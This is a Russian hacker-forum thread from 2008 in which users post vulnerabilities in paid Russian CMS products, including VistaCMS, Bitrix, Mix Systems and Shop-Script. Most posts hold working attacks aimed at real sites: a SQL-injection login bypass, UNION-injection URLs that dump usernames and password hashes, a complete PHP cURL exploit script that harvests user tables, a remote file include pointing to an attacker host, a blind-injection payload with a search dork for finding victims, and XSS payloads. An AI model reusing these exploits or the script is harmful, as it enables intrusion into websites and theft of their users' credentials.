ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обзор уязвимостей в платных Cms
  #1  
Старый 10.01.2008, 19:31
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию Обзор уязвимостей в платных Cms

VistaCMS

Оф.сайт: http://www.vistacms.ru
Стоимость (в руб.): 13000-42000 o.O
------------------------------------------------
Раскрытие путей:

http://www.vistacms.ru/modules/kerne'l/
Код:
/usr/home/admin/domains/vistacms.ru/public_html/class/page.class.php
SQL-injection

Администраторская панель:

Код:
http://www.vistacms.ru/admin/
Логин: 1' or 1=1/*
Пароль: antichat.ru

Клиенты:
Код:
http://www.vistacms.ru/clients/
Автор: ZAMUT (c)

P.S.
Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться.

Последний раз редактировалось ZAMUT; 10.01.2008 в 21:41..
 
Ответить с цитированием

  #2  
Старый 10.01.2008, 21:49
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

UMI.CMS

Оф.сайт: www.umi-cms.ru
Стоимость (в руб.): 2990-29990
------------------------------------------
XSS(Активная)

Настройки ->

Уязвимые поля:
Фамилия
Имя
Отчество

Код:
<script>alert(document.cookie)</script>
Автор: ZAMUT (c)
 
Ответить с цитированием

Abo Cms
  #3  
Старый 10.01.2008, 22:26
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию Abo Cms

Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...

цена ABO CMS на офф. сайте достигает 30000 рублей.
На этом движке работают крупные инет-магазины, банки, и т.д.

вот сплоит ТУТ написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать...
Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 10.01.2008 в 22:48..
 
Ответить с цитированием

  #4  
Старый 13.01.2008, 01:41
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

S.Builder
Разработчик CMS CBS-Group
Номер версии S.Builder 3.756
Лицензия платная
Сайт www.sbuilder.ru
Демо-версия www.demo.sbuilder.ru
Функциональность портал
Стоимость (в руб.) от 2235 до 44700 руб.

для теста в вебе создают акк на сутки

SQL-injection

20 полей

Цитата:
http://cmssite/more.php?bc_tovar_id=2+order+by+20/*'

Цитата:
http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,version(),user(),databa se()),10,11,12,13,14,15,16,17,18,19,20/*'
системная инфа
5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517


Цитата:
http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,table_schema,table_name ),10,11,12,13,14,15,16,17,18,19,20+from+informatio n_schema.tables/*'
пользователи
Цитата:
http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ binn_users/*'
название не смотрел но мона через базу глянуть

Последний раз редактировалось halkfild; 14.01.2008 в 22:19..
 
Ответить с цитированием

  #5  
Старый 15.01.2008, 03:55
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

VDNH
Оф. сайт http://www.vdnh.ru/
Лицензия - платная
Стоимость- от 6750- 176625
уязвимость - xss активная, пассивная
<script>alert('helloworld')</script>
также бажные у них гостевые книги.

Последний раз редактировалось xcedz; 09.03.2008 в 11:55..
 
Ответить с цитированием

Уязвимости в Bitrix CMS
  #6  
Старый 22.01.2008, 03:22
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию Уязвимости в Bitrix CMS

Multiple Vulns in Bitrix CMS

Версия системы и история обновления

Vulnerable: Bitrix Site Manager 4.1.x

Exploit:

Код:
http://www.bitrix.ru/bitrix/updates/updater.log
XSS в редиректе:

Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу.

Раскрытие пути

Vulnerable: Bitrix Site Manager 4.0.x

Exploit:

Код:
http://host/bitrix/templates/.default/subscribe/subscr_form.php 
http://host /bitrix/php_interface/dbquery_error.php
PHP Include

Vulnerable: Bitrix Site Manager 4.0.x

Exploit:

Код:
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
"http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/
 
Ответить с цитированием

  #7  
Старый 23.01.2008, 02:22
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Amiro.CMS

сайт: amiro.ru

XSS (passive)

Сплоентс:
Код:
/saleoffset=saleoffset=<script>alert(document.cookie)</script>
Код:
/blabla<script>alert(document.cookie)</script>
by me +)
 
Ответить с цитированием

  #8  
Старый 09.02.2008, 04:20
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Mix Systems
vendor:http://mixsystems.com.ua

price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е."

SQL injection

plugin:katalog
EX


Код:
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Код:
version::user::database
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
users id::login::pwd::email
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
plugin=photogall
Ex


Код:
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11
Код:
version::user::database
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11
users id::login::pwd::email
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
(c) halkfild


написал сплоит на CURL /*быстрее чем сокеты*/

PHP код:
<?

echo "\n";
echo 
"-------------------------Mix Systems CMS--------------------------"."\n";
echo 
"-----------------------coded by : halkfild------------------------"."\n";
echo 
"------------------------------------------------------------------"."\n";

if (
$argc!=4){
  echo 
" Usage:    php ".$argv[0]." host type num_records\n";
  echo 
" host:    Your target ex www.target.com \n";
  echo 
" type:    1 - plugin=katalog bug\n";
  echo 
"        2 - plugin=photogall bug\n";
  echo 
" num_records: number or returned records(if 0 - return all)\n";
  echo 
" example: php script.php site.com 10\n";           
  echo 
"\n";
exit;
}

$host=$argv[1];
$type=$argv[2];
$count=$argv[3];

if (
$argv[2]==1) {
  
$query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+";
  
$end=",1/*";
}
elseif (
$argv[2]==2) {
  
$query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11,12+from+ng_users+limit+";
  
$end=",1/*&cat=11";
}
else {
  echo 
" incorrect parameter #2=".$argv[2]."\n";
  echo 
" type:    1 - plugin=katalog bug\n";
  echo 
"        2 - plugin=photogall bug\n";
  exit;
}
$site=$host.'/'.$query;
$pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/';
$i=0;
  
if(
function_exists('curl_init'))
{
  while(
1) {
    
$ch curl_init("http://".$site.$i.$end);
   
    
curl_setopt($chCURLOPT_HEADER,true);
    
curl_setopt$chCURLOPT_RETURNTRANSFER,true);
    
curl_setopt($chCURLOPT_TIMEOUT,10);
    
curl_setopt($chCURLOPT_USERAGENT"Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");  
    
$res=curl_exec($ch);
    
$returncode curl_getinfo($ch,CURLINFO_HTTP_CODE);
    
curl_close($ch);
    if (
$returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n");
  
    if(
preg_match_all($pattern,$res,$out)) {
        echo 
"| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n";
        
$i++;
        
$out=null;
    }
    else break;
    
    if (
$count!=&& $i>$count) break;
     }
     echo (
"Finish. /* ".$i." records*/ \n");
}
else
exit(
"Error:Libcurl isnt installed \n");

?>
 
Ответить с цитированием

  #9  
Старый 11.03.2008, 18:54
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

ExpiCMS
www.expi-cms.ru
стоимость
1. Лицензия 1 год - 6 900 руб.

2. Лицензия 3 года - 12 900 руб.

3. Неограниченная лицензия - 17 490 руб

Пассивная xss

вход в админку www.expi-cms.ru/cms/login.php

в логин и пароль вставляеем например такую конструкцию

</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>

Цитата:
так например на marypoppinscafe.ru/cms/login.php выдает некотрую интересную информацию в частности User - mary_poppins DataBase - cms_express_oksana_mary_poppins

Последний раз редактировалось xcedz; 11.03.2008 в 19:36..
 
Ответить с цитированием

SQL inj в Shop-Script
  #10  
Старый 16.03.2008, 20:22
Аватар для big_BRAT
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию SQL inj в Shop-Script

Shop-Script
Разработчик Articus dev. group
Лицензия платная
Сайт www.shop-script.ru/
Демо-версия www.demo.shop-script.ru/premium
Функциональность e-магазин
Стоимость (в руб.) от 0 до 5450 руб.

SQL injection

уязвимый скрипт invoice_phys.php
уязвимый парамерт order_time=
данные передаются кодированные в base64; возможен только посимвольный перебор
Пример уязвимого куска кода:
PHP код:
$_GET["orderID"] = (int) $_GET["orderID"];
$sql 'SELECT COUNT(*) FROM '.ORDERS_TABLE.'
WHERE orderID='
.$_GET["orderID"].' AND
order_time="'
.base64_decode($_GET["order_time"]).'" AND 
customer_email="'
.base64_decode($_GET["customer_email"]).'"'
Пример:
Код:
2008-03-16 14:24:11" or 1=1/*
Рабочий "код":
Код:
2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*
который нужно прогнать через base64_encode и передать скрипту.
Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде

Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22
Приблизительно 1500 стр...
Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html

Уязвимость не где не вылаживал, античат первый))

Последний раз редактировалось big_BRAT; 16.03.2008 в 20:25..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57
Статья обзор уязвимостей бесплатных почтовых сервисов markel E-Mail 3 12.09.2005 10:07
Обзор рынка взломщиков электронной почты, март2004 Игорь Белкин E-Mail 5 25.03.2004 12:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ